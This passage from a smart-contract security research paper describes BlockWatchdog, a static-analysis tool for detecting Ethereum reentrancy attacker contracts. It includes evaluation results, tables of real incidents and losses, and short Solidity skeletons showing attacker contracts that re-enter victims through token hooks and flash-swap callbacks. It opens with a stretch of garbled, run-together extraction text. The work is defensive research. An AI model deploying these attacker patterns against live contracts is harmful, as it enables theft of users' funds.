attackercontractscanhelpidentifytrulyexploitableyetvulnerable availableforpublicaccessinouropenrepository. contracts. 3.2 DataAnalysis Poorperformanceindetectingreentrancy.Existingreentrancy detectiontoolshaveanextremelyhighfalsepositiverate.More Attackercontractidentification. Aswedonotknowhowhack- than99.8%ofthereentrantcontractsdetectedbythetools[7,28, ersperformtheattack,weintendtofindtheattackercontractsto 29,39,48]arefalsepositives[60],asthesetoolsdonotdetectsome analyzetheattacklogicfromthecollecteddata.Specifically,two protectionpatterns,suchasthereentrancylock.Toreducefalsepos- ofourauthors,bothwithmorethantwoyearsofexperiencein itives,detectingattackercontractscanhelpfindthosehackerswho blockchainsecurity,manuallyanalyzedthe281incidentscollected aimattrulyexploitablecontractswithoutreentrancyprotections. using the open card sorting approach [43]. During the manualICSE2024,April2024,Lisbon,Portugal ShuoYang,JiachiChen,MingyuanHuang,ZibinZheng,andYuanHuang check,weidentifiedtwodistincttypesofattacks:thosedirectly theattackercontractautomaticallyexecutesandinitiatesexternal attackedbyexternallyownedaccounts(EOAs)ofhackersandthose callstothevictimcontracts.Notably,inreentrancyattacks,the attackedbyattackercontractsthathackersdeployed. attackercontractcanpassparameterstovictimcontracts,which makesthemcallbacktotheattackercontractagain,andtherecan Table1:AttackTypesObtainedfromCollectedData bemultiplevictimsinthiscallchain.AsshowninFigure3,wesum- marizethreetypesofreentrancybasedonthefunctionsutilizedby DoS BR IO RE IA CI CAD FL Others attackercontractstoperformreentrancy,i.e.,(1)fallback(),poor AC/EOA designswhenusing(2)ERCtokens,or(3)user-definedinterfaces. CA Specifically,theattackercontractcanimplementreentrancylogic (cid:71)(cid:35) (cid:32) (cid:35) (cid:32) (cid:35) (cid:35) (cid:35) (cid:32) (cid:71)(cid:35) (cid:47) (cid:47) (cid:47) (cid:47) (cid:47) (cid:47) (cid:47) (cid:47) (cid:47) inthefallback()functionwhenreceivingEthers.Itcanalsoinject callbacksintohookfunctionswhenusingERCtokens,e.g.,hook Wethenclassifytheattacktypesbasedonthenecessityofanat- tackercontractandtheavailabilityoftheattackercontract’ssource functiononERC721ReceivedwhenusingERC721,oruser-defined interfaces,e.g.,thecaseshowninFigure1,toimplementreentrancy. code.Table1showstheeighttypesofattackthatweidentified fromour281collectedincidents.Weusethe“Others”categoryto 3.3 AttackerContractFeatures coverattacksthattargetspecificdesignflawsofvictims,e.g.,infi- niteapprovaltovulnerablecontracts[37].The and symbolsin Figure4showsanexamplethatillustratesthehigh-levelfeatures thecolumn“AttackerContract”representattacktypesthatrequire ofthereentrancyattackfocusingonthecallflow.Toperformthe (cid:32) (cid:35) deployingtheattackercontract(AC)orusingEOAtransactions, reentrancyattack,theattackercontract(1)firstcallsthevictim respectively. 
During the manual check, we identified two distinct types of attacks: those directly launched from externally owned accounts (EOAs) of hackers and those launched by attacker contracts that hackers deployed.

Table 1: Attack Types Obtained from Collected Data

            DoS  BR  IO  RE  IA  CI  CAD  FL  Others
    AC/EOA   ◐   ●   ○   ●   ○   ○   ○    ●    ◐
    CA       ✗   ✗   ✗   ✗   ✗   ✗   ✗    ✗    ✗

We then classify the attack types based on the necessity of an attacker contract and the availability of the attacker contract's source code. Table 1 shows the eight types of attacks that we identified from our 281 collected incidents. We use the "Others" category to cover attacks that target specific design flaws of victims, e.g., infinite approval to vulnerable contracts [37]. The ● and ○ symbols in the "Attacker Contract" row represent attack types that require deploying an attacker contract (AC) or using EOA transactions, respectively. The ◐ symbol represents attack types that do not require the deployment of an attacker contract in some cases. The ✗ symbol in the "Code Availability" (CA) row represents attacker contracts whose source code is not available. Among the 281 samples, we found 31 attacker contracts from 28 reports, classified as Denial of Service (DoS), Bad Randomness (BR), Reentrancy (RE), Flashloan (FL), and Others. Attacks such as Integer Overflow (IO), Improper Authentication (IA), Call Injection (CI), and Call-after-destruct (CAD), which do not involve attacker contracts, are out of the scope of our analysis. As this paper focuses on new types of reentrancy vulnerabilities missed by existing vulnerability detection tools, we will illustrate reentrancy vulnerabilities from the perspective of the 18 reentrancy attacker contracts collected.

Decompilation and understanding. To gain a deeper understanding of the attacker behaviors employed by reentrancy attacker contracts, we collected the bytecode of the attacker contracts for analysis, as none of the identified attacker contracts released their source code to the public. We decompiled the EVM bytecode to recover a readable intermediate representation (IR) of each attacker contract. We then followed the attack process and description in the corresponding report to understand how the attacker implements the attack logic in its bytecode. Figure 3 provides an overview of how attacker contracts exploit victim contracts. The hacker first programs the attacker contract and deploys it on the blockchain. Subsequently, the attacker contract automatically executes and initiates external calls to the victim contracts. Notably, in reentrancy attacks, the attacker contract can pass parameters to victim contracts that make them call back to the attacker contract again, and there can be multiple victims in this call chain. As shown in Figure 3, we summarize three types of reentrancy based on the functions utilized by attacker contracts to perform reentrancy: (1) fallback(), and poor designs when using (2) ERC tokens or (3) user-defined interfaces. Specifically, the attacker contract can implement reentrancy logic in the fallback() function executed when receiving Ethers. It can also inject callbacks into hook functions when using ERC tokens, e.g., the hook function onERC721Received when using ERC721, or into user-defined interfaces, e.g., the case shown in Figure 1, to implement reentrancy.

Figure 3: An overview of reentrancy attacks.

3.3 Attacker Contract Features
Figure 4 shows an example that illustrates the high-level features of a reentrancy attack, focusing on the call flow. To perform the reentrancy attack, the attacker contract (1) first calls the victim contract (step i in Figure 4) to make the victim invoke a callback (step ii) to the attacker's hook function or transfer Ether to the attacker contract (step iii); (2) the attacker contract then calls the victim again in the hook function or the fallback function and re-enters (step iv) to invoke functions that can generate unfair profits (step v); (3) next, the profits can be transferred to the attacker's EOA (step vi) to complete the reentrancy attack. This call flow information shows how the attacker contract interacts with the victim contract. The three summarized types of reentrancy help us identify reentrancy from function-level call information. The design of our method, presented in the following section, is based on these features obtained from our empirical study.

Figure 4: An example to illustrate a reentrancy attack.
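To make type (2) concrete, below is a minimal sketch (not from the paper; the INftMarket interface and function names are hypothetical) of an attacker skeleton that re-enters a victim from the ERC721 onERC721Received hook, following steps i-iv of Figure 4.

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Hypothetical interface for an NFT market that uses ERC721
    // safeTransferFrom, which invokes onERC721Received on contract
    // recipients: the type-(2) reentry point described above.
    interface INftMarket {
        function buy(uint256 tokenId) external payable;
    }

    contract HookAttacker {
        INftMarket private market;
        uint256 private reentered;

        constructor(INftMarket _market) payable {
            market = _market;
        }

        function attack(uint256 tokenId) external {
            market.buy{value: 1 ether}(tokenId); // step i
        }

        // Called by the victim during safeTransferFrom: steps ii and iv
        // of Figure 4 happen here, before the victim finishes its own
        // state updates.
        function onERC721Received(
            address, address, uint256 tokenId, bytes calldata
        ) external returns (bytes4) {
            if (reentered < 2) {
                reentered += 1;
                market.buy{value: 1 ether}(tokenId); // re-enter the victim
            }
            return this.onERC721Received.selector;
        }
    }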
4 METHODOLOGY
In this section, we introduce the BlockWatchdog tool, which can detect attacker contracts that perform reentrancy attacks. We first give an overview of the approach and then provide the details from the perspectives of flow information extraction, cross-contract static analysis, and attacker contract detection.

4.1 Overview
BlockWatchdog consists of three main components: the Decompiler, the Cross-Contract Dataflow Analyzer, and the Attack Identifier. Figure 5 shows an overview of the BlockWatchdog approach. The tool accepts a contract's bytecode or a real address on Ethereum as input. If a contract address is provided, the tool retrieves the bytecode via the Web3 API [52]. In the Decompiler, BlockWatchdog decompiles the bytecode to the IR and extracts critical flow information for dataflow analysis. Next, the Cross-Contract Dataflow Analyzer constructs the xCFG and xCG of the contract according to the information obtained from decompilation. We use the xCFG and xCG to bridge the flow information of all contracts in the call chains for taint analysis. Taints originating from the attacker contract are propagated through the function call arguments and returns based on the designed transfer rules, while tracing all possible call chains in the xCG. Finally, the Attack Identifier identifies and reports the three attack types based on our detection patterns, using the result of the taint flow analysis.

To implement BlockWatchdog, we adopt a public node provided by Alchemy [3] to request data from the blockchain. Specifically, we use the Web3 API getCode to fetch the bytecode of a contract and getStorageAt to obtain the storage data at a specific slot and offset of a contract account. For decompilation, we use the EVM bytecode decompiler Elipmoc, which improves over all notable past decompilers [17, 22]. Elipmoc disassembles the EVM bytecode into EVM opcodes and constructs the control flow graph by identifying flow-related opcodes like JUMP and JUMPI. The function borders and the IR are then recovered for further analysis.

Figure 5: An overview of the approach of BlockWatchdog.
4.2 Flow Information Extraction
When analyzing an input contract, the first step in BlockWatchdog is to decompile its EVM bytecode to the IR. In the Decompiler component, we extract flow information from the IR to enable dataflow analysis and attack vector identification.

Constant contract address and function signature identification. To conduct cross-contract static dataflow analysis, we need to identify the target contracts and functions that the input contract intends to call. Based on our analysis of previous attack incidents, we observe that attacker contracts typically hard-code the contract address with which they want to interact or store the target contract's address in storage. Therefore, we use the decompiler to identify the constant value (conforming to EIP-55 [11]) of the callee contract address. The slot number with specific offsets to locate the storage address can be obtained through the Web3 API getStorageAt. Additionally, we identify the function signatures through decompilation, which specifies which functions can be invoked in each external call. For each external call identified in the caller contract, we obtain the callee contract and function signature to locate the callee site of the contract being called, allowing us to construct the entire xCFG and xCG for inter-procedure cross-contract analysis.

Flow and external call information extraction. To extract the flow information from a contract, we first obtain every entrance and exit of the contract. For every public function identified by the decompiler, we extract its function arguments and return parameters, which denote the start and end points of the dataflow within the function, respectively. Function arguments can also flow to the parameters of external calls made within the function, while the return values of external calls can flow back to the function's return parameters. Therefore, we design five dataflow rules, shown in Table 2, for each public function in the contract.

Table 2: Dataflow Rules in Intra-Procedure Analysis
    Flow Type        | Meaning
    FuncArgToCallArg | flow from function arguments to call arguments
    FuncArgToFuncRet | flow from function arguments to function returns
    FuncArgToCallee  | flow from function arguments to callee variables
    CallRetToCallArg | flow from call returns to call arguments
    CallRetToFuncRet | flow from call returns to function returns

We illustrate each rule based on Figure 6. Taking FuncArgToCallArg and FuncArgToCallee as an example: in Figure 6, function argument v2 of the function bar() (L2-L10) flows to the arguments of the external call target.foo() (L4) by rule FuncArgToCallArg. In contract target, the function argument v1 of foo() (L16-L22), which is set by the caller contract from (line (i) in Figure 6), can flow to the callee variable v1 of the call operation v1.hook(v2) (L19) through rule FuncArgToCallee (line (ii) in Figure 6). By combining these two rules, we obtain the flow information that address(this) (L4), set by contract from, can flow to the callee variable v1 (L19) in contract target. In this case, contract from can make contract target call its implemented function hook through the dataflow process. The call flow then returns to contract from, which makes it capable of calling back to target.foo() again (L12), and leads to the reentrancy.

Figure 6: Toy contracts for flow information illustration.
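Figure 6 itself is not reproduced in this extraction. The sketch below is reconstructed from the prose above (contract from with bar() and hook(), contract target with foo()); it is an approximation, and its line positions only loosely correspond to the (Lx) references in the text.

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // Reconstruction of the Figure 6 toy contracts based on the prose:
    // bar()'s arguments flow into target.foo() (FuncArgToCallArg), and
    // inside target, foo()'s first argument becomes the callee of
    // v1.hook(v2) (FuncArgToCallee), letting `from` be called back.
    interface IHook {
        function hook(uint256 v2) external;
    }

    contract Target {
        function foo(IHook v1, uint256 v2) external {
            // Callee variable v1 is controlled by the caller contract.
            v1.hook(v2);
        }
    }

    contract From {
        Target private target;
        uint256 private count;

        constructor(Target _target) {
            target = _target;
        }

        function bar(uint256 v2) external {
            // address(this) flows into the callee-determining argument.
            target.foo(IHook(address(this)), v2);
        }

        function hook(uint256 v2) external {
            // Control returns here; calling target.foo() again closes
            // the reentrant loop described in Section 4.2.
            if (count < 1) {
                count += 1;
                target.foo(IHook(address(this)), v2);
            }
        }
    }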
Additionally, we focus on whether the input contract implements an external call in a hook or fallback function, which attackers can leverage to make other contracts call back and succeed in re-entering the attacker contract. We summarize six hook functions from five Ethereum Improvement Proposals (EIPs) [10] that we find to be involved in our collected reentrancy attacker contracts, as shown in Table 3. Notably, we list these hook functions to illustrate the features of the attacker contracts; BlockWatchdog does not rely on these specific function signatures but focuses on the call flow features. Furthermore, the fallback function called when receiving Ethers and user-defined interfaces, e.g., IVisor.delegatedTransferERC20(), can also be used to perform reentrancy. Therefore, based on the external call information found in these types of functions and the flow information extracted during the intra-procedure analysis, BlockWatchdog determines whether a reentrancy attacker contract is present.

Table 3: Hook Functions Declared by EIPs
    Standard | Function Name                   | Function Signature
    EIP-20   | transferFrom                    | 0x01c6adc3
    EIP-721  | onERC721Received                | 0x150b7a02
    EIP-1155 | onERC1155Received               | 0xf23a6e61
    EIP-777  | tokensToSend                    | 0x75ab9782
    EIP-777  | tokensReceived                  | 0x0023de29
    EIP-1820 | canImplementInterfaceForAddress | 0x249cb3fa
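As background (not stated in the paper), the 4-byte signatures in Table 3 are the first four bytes of the keccak256 hash of the canonical function prototype. A small sketch showing the derivation for the two ERC-standard hooks, whose selector values are well known:

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    // selector = first 4 bytes of keccak256(canonical prototype)
    contract SelectorDemo {
        function compute(string memory prototype) public pure returns (bytes4) {
            return bytes4(keccak256(bytes(prototype)));
        }

        // Returns 0x150b7a02, as listed for EIP-721 in Table 3.
        function erc721Hook() external pure returns (bytes4) {
            return compute("onERC721Received(address,address,uint256,bytes)");
        }

        // Returns 0xf23a6e61, as listed for EIP-1155 in Table 3.
        function erc1155Hook() external pure returns (bytes4) {
            return compute("onERC1155Received(address,address,uint256,uint256,bytes)");
        }
    }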
4.3 Cross-contract Static Analysis
In this subsection, we describe how we use the decompiled intermediate representation (IR) and intra-procedure information to construct the xCFG and xCG of the attacker contract and its interacting contracts. Algorithm 1 presents an overview of how the attacker contract is identified. We first construct the call chain of every public function that contains an external call, E_f, using the extracted flow information (L1). Then, we use the depth-first search (DFS) algorithm for each public function f to find its external call target contracts and functions to construct the xCFG and xCG (L2-L3). We apply the tainted source identification rules to find the tainted source s in the input contract's function (L4). Then, we use the sink identification rules for each call chain in the constructed xCG to find sensitive variables t that can cause the attack (L6), such as function arguments flowing to callee variables. To determine whether contract C can successfully make the other contract call back to itself, we use the transfer rules from source to sink to obtain reachability (L7) and find possible attack call chains.

Algorithm 1: Cross-contract Static Analysis for Identifying Attacks
    input:  C, the input contract bytecode
    output: AC ← [], the list of possible attack call chains
    1: E_f ← findFunctionsWithExternalCall(C)
    2: for each function f ∈ E_f do
    3:     P_c ← searchCallPathsByDFS(f)
    4:     s ← getSource(f)
    5:     for each path p ∈ P_c do
    6:         t ← getPossibleSink(p)
    7:         if isReachable(s, t, rules)
    8:             AC ← AC ∪ p, break
    9: return AC

4.3.1 xCFG Construction & Call Chain Gathering. To perform static dataflow analysis, we first need to construct the xCG and xCFG of the input contract. We obtain the bytecode of the interacted contracts based on the contract addresses identified during decompilation. Then, for every external call of the input contract, we find the call-target contract address and function signature. Based on the tuple <call site, caller_address, caller_funcSign, target_contract, target_funcSign>, we find every call site that executes the CALL opcode and its call target. We then use the DFS algorithm to construct the xCFG and gather all possible call chains originating from the public functions of the input contract to construct the xCG for the dataflow analysis.

4.3.2 Cross-contract Dataflow Analysis. We define the tainted source, sink site, and transfer rules of our dataflow analysis for identifying attacks in Table 4. For a contract C and its external call f with argument set A in the example, we define all external call arguments A_s in contract C as tainted. Then, for every called contract, we mark every callee variable that determines a call target address, C_t, as a sink site. We apply the rules shown in Table 2 to determine whether the tainted source can flow to the sink site. If there is a feasible path for that dataflow, it is possible that the input contract can make the called contract call a specific address that the attacker designed, which helps us find whether there is reentrancy.

Table 4: Dataflow Rules for Identifying Attacker Contracts
    Example | C.f(A), where f is an external call to contract C and A is the set of arguments
    Source  | the external call argument set A_s of the input contract
    Rules   | the 5 intra-procedure dataflow rules in Table 2
    Sink    | the callee C_t of external calls in called contracts
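As a worked illustration of Table 4's roles (not from the paper; contract and function names hypothetical), the sketch below annotates where the tainted source and the sink site sit in a minimal contract pair.

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    interface ICallback {
        function notify() external;
    }

    // Hypothetical called contract.
    contract Called {
        function f(address a) external {
            // SINK: `a` determines the callee of an external call and is
            // reachable from the input contract's call argument.
            ICallback(a).notify();
        }
    }

    // Hypothetical input contract under analysis.
    contract Input {
        Called private c;

        constructor(Called _c) {
            c = _c;
        }

        function run() external {
            // SOURCE: address(this) is an external call argument (A_s).
            c.f(address(this));
        }

        function notify() external {
            // If this function re-entered `c`, the call chain would match
            // the reentrancy condition given in Section 4.4.
        }
    }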
4.4 Attacker Contract Detection
In this subsection, we present the specific rules for detecting reentrancy attacks by the attacker contract, using flow information and cross-contract dataflow analysis.

The reentrancy attack is reflected in the call chain that we recover by cross-contract static analysis. Specifically, we detect an attacker contract that can perform a reentrancy attack in three steps. Step 1: We first determine whether there is a call path that causes tainted variables to flow to the sink site, using the rules we designed in the cross-contract analysis illustrated in Section 4.3.2. For example, in Figure 6, the attacker can call function bar() (L2-L10) to invoke the external call target.foo() (L16-L22). The function argument v1 (L16) can flow to the callee of the external call v1.hook(v2) (L19) in contract target, which means contract from can manipulate the call target of v1.hook(). We then find the target call function hook() (L11-L12) of the reachable sink site v1.hook() (L19). Step 2: We determine whether there is an implementation of the function hook() (L11-L12) in the input contract, i.e., contract from. Step 3: If Step 2 is true, we find the call target contract address and function signature to determine whether they are visited in the call path, and judge whether there is a reentrancy attack. In the example, contract from calls back to the function foo() again in the function hook() to perform reentrancy.

We use the following expression to define the conditions for a reentrancy attack. We first establish the reachability of the sink site in contract tar, which calls the function f of contract to. The address of contract to can be set by the attacker, which is the tainted source denoted by A_s. Furthermore, the function f should be implemented in the attacker contract's public function list C_F, and the external calls f_EC, including the call target address and function signature, should be visited in the call path. If all conditions are met, we consider it a reentrancy attack.

    Reentrancy ⇐ Reachable(tar, f, to),  to ∈ A_s,  f ∈ C_F,  f_EC ∈ Visited

5 EVALUATION
In this section, we evaluate the effectiveness of BlockWatchdog based on the ground-truth dataset collected from attack reports and a large-scale dataset obtained through blockchain transaction replay.

5.1 Evaluation Setup
The experiment was conducted on a server running Ubuntu 20.04.1 LTS and equipped with 18 Intel(R) Core(TM) i9-10980XE CPUs @3.00GHz and 250 GB memory.

Dataset. We use two datasets to evaluate BlockWatchdog. The first is the ground-truth dataset, which comprises reentrancy attacker contracts that we collected by analyzing attack incident reports. This dataset contains 18 attacker contracts from 15 incidents. The second, large-scale dataset consists of 421,889 real-world contract bytecodes (both creation and runtime). These contracts are obtained by replaying transactions from block number 10 million to 15.5 million on the Ethereum mainnet.

Evaluation Metrics. We formulate the following research questions (RQs) to evaluate BlockWatchdog.
RQ1. How effective is BlockWatchdog in detecting reentrancy attacks on the ground-truth dataset?
RQ2. How does BlockWatchdog perform in finding attacker contracts in the large-scale dataset?
RQ3. How much financial loss is caused by the identified attacks, and are vulnerability detection tools able to find those vulnerable victims?
5.2 Answer to RQ1: Effectiveness on the Ground-Truth Dataset
To answer RQ1, we run BlockWatchdog on our ground-truth dataset of 18 attacker contracts from our collected reports. BlockWatchdog correctly reports 15 out of 18 reentrancy attacker contracts, as shown in Table 5. The second and third columns show the name of the DApp and the time it was attacked; the fourth and fifth columns give the loss of the attack and the platform on which the DApp was deployed. Columns six to eight show the address of the exploiter, the attacker contract, and the victim contract, respectively. The last column denotes whether BlockWatchdog can identify the attacker contract. Noticeably, we find two exploiters (0xce and 0x80) in the Cream Finance attack among our collected incidents, and these two exploiters deployed two (0xbd and 0x38) and one (0x32) attacker contracts, respectively, to attack the same victim contract (0xce). Similarly, the exploiter (0x61) that attacked the Fei Protocol and Rari DApps deployed two attacker contracts (0xE3 and 0x32) to attack the victim contract (0xfb). We find that BlockWatchdog fails to identify three reentrancy attacker contracts for two reasons. The first is the inability of BlockWatchdog to recover the call chain when the call target addresses and functions in the attacker contracts are obtained from memory. Given that memory values cannot be determined via static analysis, BlockWatchdog relies on the constant values of callee addresses or call target function signatures for complete call chain recovery. In the case of the Fei Protocol and Rari incident, BlockWatchdog cannot identify the attacker contracts because the call target contract address is loaded from memory. The memory value can only be determined at runtime, making BlockWatchdog fail to deduce the call target and recover the call chain. The second reason pertains to the limitations of BlockWatchdog's function signature identification. Since BlockWatchdog is based on Elipmoc [17], which may not recover all function signatures, this limitation may lead BlockWatchdog to miss some external calls. For example, BlockWatchdog cannot detect the reentrancy attack in the Spankchain incident, as the call target function LCOpenTimeout() is not identified in the victim contract. As the dataflow procedure ends with an unknown target, BlockWatchdog fails to recover the call chain and identify the reentrancy. Despite such cases, the recall of BlockWatchdog reaches 83.3% in our experiments.

Table 5: Attacker Contracts in the Dataset and Detection Results of BlockWatchdog (BW)
    #  | DApp                | Attack Time | Loss ($) | Platform | Exploiter      | Attacker Contract              | Victim Contract | BW
    1  | Spankchain          | 2018/10/9   | 38K      | ETH      | 0xcf267eA3f1eb | 0xc5918a927C4F                 | 0xf91546835f75  | ×
    2  | Uniswap             | 2020/4/18   | 220K     | ETH      | 0x60f3FdB85B2F | 0xBD2250D713bf                 | 0x1f9840a85d5a  | ✓
    3  | Lendf.Me            | 2020/4/19   | 24.7M    | ETH      | 0xa9bf70a420d3 | 0x538359785a8D                 | 0x0eEe3E3828A4  | ✓
    4  | Akropolis           | 2020/11/12  | 2M       | ETH      | 0xe2307837524D | 0x38c40427efbA                 | 0x1cec0e358f88  | ✓
    5  | DeFiPie             | 2021/7/12   | 350K     | BSC      | 0xf6f43f77ef9e | 0x6d741523F1Fc                 | 0x607C794cDa77  | ✓
    6  | xSurge              | 2021/8/16   | 25M      | BSC      | 0x59c686272e6f | 0x1514aaa4dcf5                 | 0xE1E1Aa58983F  | ✓
    7  | Cream Finance       | 2021/8/31   | 5M       | ETH      | 0xce1f4b4f1722 | 0xbd51Cb8c06F7, 0x38c40427efbA | 0xce1f4b4f1722  | ✓
       |                     |             |          |          | 0x8036EbD0Fc9C | 0x32d77947aACa                 |                 | ✓
    8  | Grim Finance        | 2021/10/16  | 30M      | FTM      | 0xDefC385D7038 | 0xb08cCb39741d                 | 0x279b2c897737  | ✓
    9  | Visor Finance       | 2021/12/21  | 8.2M     | ETH      | 0x8efab89b497b | 0x10C509AA9ab2                 | 0xc9f27a50f825  | ✓
    10 | Paraluni            | 2022/3/13   | 1.7M     | BSC      | 0xA386F30853A7 | 0x4770b5cb9d51                 | 0x94bC1d555E63  | ✓
    11 | Agave & Hundred     | 2022/3/15   | 5.5M     | ETH      | 0xcE1F4B4F1722 | 0x38c40427efbA                 | 0xf8D1677c8a0c  | ✓
    12 | Revest              | 2022/3/27   | 120K     | ETH      | 0xef967ece5322 | 0xb480ac726528                 | 0x2320a28f5233  | ✓
    13 | Fei Protocol & Rari | 2022/4/30   | 80.3M    | ETH      | 0x6162759eDAd7 | 0xE39f3C40966D, 0x32075bAd9050 | 0xfbD8Aaf46Ab3  | ×
    14 | Omni                | 2022/7/10   | 1.4M     | ETH      | 0x00000000c251 | 0x3c10e78343c4                 | 0x3c10e78343c4  | ✓
    15 | SushiBar            | 2022/10/25  | 15K      | ETH      | 0x8ca72f46056d | 0x9C5A2A643152                 | 0x2321537fd8EF  | ✓
5.3 Answer to RQ2: Attacker Contract Detection in a Large-scale Dataset
To answer RQ2, we ran BlockWatchdog on the 421,889 smart contracts obtained from blockchain transaction replay. The experimental results show that BlockWatchdog reports 253 contracts as attacker contracts. We next evaluate the performance of BlockWatchdog using a manual labeling process. Two authors manually inspected the 253 samples reported as attacker contracts, following a four-step procedure. First, the decompiled intermediate representation (IR) of the attacker contract was thoroughly examined. Second, the function that performs the attack reported by BlockWatchdog was located. Third, the call chains reported by BlockWatchdog were checked. Finally, based on these examinations, it was determined whether a contract is an attacker contract, and the associated financial loss was recorded. The labeled results show that 113 samples are indeed attacker contracts that perform reentrancy attacks.

In the large-scale experiment, some metrics were collected to help us evaluate BlockWatchdog more comprehensively. Regarding the structure of the constructed xCFG and xCG, the average number of visited contracts and the call depth of the recovered xCG are 0.95 and 0.21, respectively. The same indicators for true attacker contracts are 7.66 and 2.55, respectively. This indicates that many attacker contracts directly hardcode the victim contracts' addresses for implementing the attack. In addition, the average detection time for BlockWatchdog to analyze an attacker contract is 17.66 seconds. An attacker contract can interact with a maximum of 105 contracts in a single call chain, with the maximum call depth reaching 21. Such deep call chains involving multiple contracts and functions expose the limitations of simple pattern-based rules in covering complex reentrancy attacks.

We also have some interesting findings related to the design of attacker contracts. For example, 19 attacker contracts were designed with attack logic to hack victim contracts, but these attempts failed, resulting in reverted transactions. Most of these contracts have only two transactions, i.e., the contract creation transaction and the failed attack transaction. Moreover, some exploitation function names, such as Attack, Rugpull, Exploit, and Trigger, are commonly used in attacker contracts. This interesting discovery provides information for function signature or name identification to find potential attacker contracts, and provides insights into the development preferences of hackers.

False positives. We identify two types of false positives generated by BlockWatchdog when detecting reentrancy attacker contracts. The first type involves the use of getter functions to make external calls in the reentrant hook function, without performing any other profitable external call operations. The second type involves the usage of a permission check mechanism, where some contracts use msg.sender as the transfer target or to constrain the caller of the hook function, with no intention of making external calls to attack others. BlockWatchdog reports all cases based on the reentrancy path to minimize false negatives, which may generate false positives.
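For illustration, below is a minimal sketch (not from the paper; IVault and all names are hypothetical) of a benign contract that combines both false-positive patterns just described: the hook constrains its caller via msg.sender and makes only a getter-style external call, yet its call-flow shape still resembles a reentrancy path.

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    interface IVault {
        function positionOf(address owner) external view returns (uint256);
    }

    // Hypothetical benign receiver: permission-checked hook with a
    // getter-only external call; nothing profitable is re-entered.
    contract BenignReceiver {
        address public immutable vault;
        uint256 public lastPosition;

        constructor(address _vault) {
            vault = _vault;
        }

        function onERC721Received(
            address, address, uint256, bytes calldata
        ) external returns (bytes4) {
            // Permission check: only the trusted vault may invoke the hook.
            require(msg.sender == vault, "unexpected caller");
            // Getter-style external call only; no funds are withdrawn.
            lastPosition = IVault(vault).positionOf(address(this));
            return this.onERC721Received.selector;
        }
    }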
usemsg.sender asthetransfertargetortoconstrainthecallerof thehookfunction,withnointentionofmakingexternalcallsto Table6:Top5HookFunctionsandCallTargetFunctionsin attackothers.BlockWatchdogreportsallcasesbasedonthereen- IdentifiedAttackerContractswithOccurrenceTimes trancypathtominimizefalsenegatives,whichmaygeneratefalse positives. HookFunction Times CallTarget Times uniswapV2Call 73 balanceOf 111 5.4 AnswertoRQ3:FinancialLossofVictims onFlashLoan 13 transfer 102 Duringthelabelingprocess,wefoundthatthetotalfinancialloss onERC721Received 9 approve 53 causedbythetruepositiveattackswas908.4millionUSD.Thisloss delegatedTransferERC20 2 withdraw 25 comprisedapproximately840Ethers(about1.7millionUSD)andto- onERC1155Received 2 deposit 23 kensworth906.9millionUSD.Notably,thelossoftokensaccounted for99.8%ofthetotalfinancialloss,indicatingthatnewtypesof Table 6 shows the signatures of the call targets in the hook reentrancyattacksareprimarilycausedbypoordesignswhenusing
Table 7 shows the top 5 attacks identified by BlockWatchdog, ranked by their financial loss. We find that vulnerable contracts may be attacked multiple times once they have been exploited successfully. Specifically, BlockWatchdog identified 9, 4, and 3 attacker contracts that were deployed to attack the projects Cream Finance [9], Omni [1], and Visor Finance [19], respectively, resulting in a total financial loss of 906.7 million USD. Cream Finance was hacked via the hook function tokensReceived() in the attacker contract, which implements multiple token-borrow logic to perform a flashloan attack in a reentrancy call path; this demonstrates the complexity of the new types of reentrancy attacks. Omni was attacked by attacker contracts that implemented reentrancy logic in the hook function onERC721Received() when transferring NFTs. Hackers repeatedly minted, borrowed, and withdrew NFTs before changing the liquidation state. Visor Finance was exploited by attacker contracts that implemented delegatedTransferERC20(), a user-defined hook function, as shown in Figure 1. In addition, BlockWatchdog identified 40 zero-day attacker contracts and a total of 159 victim contracts, which were targeted by the attacker contracts to perform reentrancy attacks.

Table 7: Top 5 Attacks Ranked by Financial Loss
    Attacker Contract | Hook Function          | Loss (USD)
    0x10c509aa9ab2    | delegatedTransferERC20 | 904 million
    0xc51bdc9aebba    | tokensReceived         | 0.56 million
    0x86f28c7030bd    | onERC721Received       | 0.28 million
    0xbc82ab5a8223    | tokensReceived         | 0.28 million
    0x3292818dB514    | uniswapV2Call          | 0.28 million
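Since uniswapV2Call() tops Table 6, a brief sketch of that shape may help: it is the callback a Uniswap V2 pair invokes on the recipient of a flash swap, and attacker contracts place their reentrant logic inside it. This skeleton is not from the paper; the IVictim interface and all names are hypothetical.

    // SPDX-License-Identifier: MIT
    pragma solidity ^0.8.0;

    interface IUniswapV2Pair {
        function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    }

    // Hypothetical victim exposing the call targets frequent in Table 6.
    interface IVictim {
        function deposit(uint256 amount) external;
        function withdraw(uint256 amount) external;
    }

    contract FlashSwapAttacker {
        IUniswapV2Pair private pair;
        IVictim private victim;

        constructor(IUniswapV2Pair _pair, IVictim _victim) {
            pair = _pair;
            victim = _victim;
        }

        function attack(uint256 amount) external {
            // Non-empty data makes the pair call back into uniswapV2Call().
            pair.swap(amount, 0, address(this), abi.encode(amount));
        }

        function uniswapV2Call(address, uint, uint, bytes calldata data) external {
            uint256 amount = abi.decode(data, (uint256));
            // Borrowed funds are used against the victim before repayment;
            // these calls mirror Table 6's frequent targets.
            victim.deposit(amount);
            victim.withdraw(amount);
            // ...repayment of the pair is omitted in this sketch.
        }
    }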
6.1 Case Study
Figure 7 shows a code snippet of the attacker contract, identified by BlockWatchdog, that aimed to attack Revest [40]. This attacker contract was first deployed at Mar-27-2022 01:10:05 AM +UTC, and about half an hour later, the first attack was launched at Mar-27-2022 01:41:46 AM +UTC. Specifically, the function with signature 0xdd869c35 was invoked by the exploiter to call the victims. The call chain was then turned back and controlled by the attacker contract twice through invocations of the hook functions uniswapV2Call() (L1-L4) and onERC1155Received() (L6-L17). The attacker contract queried for the next NFT id (function getNextId() (L12)) and deposited another one via the function depositAdditionalToFNFT() (L13). Finally, another NFT was successfully minted to the attacker without being paid for in this reentrancy attack.

1  function uniswapV2Call(address varg0, uint256 varg1, uint256 varg2, bytes varg3) public nonPayable {
2      v18, v19 = stor_18_0_19.call(0x2e236bc, address(this), 1, ...);
3      ...
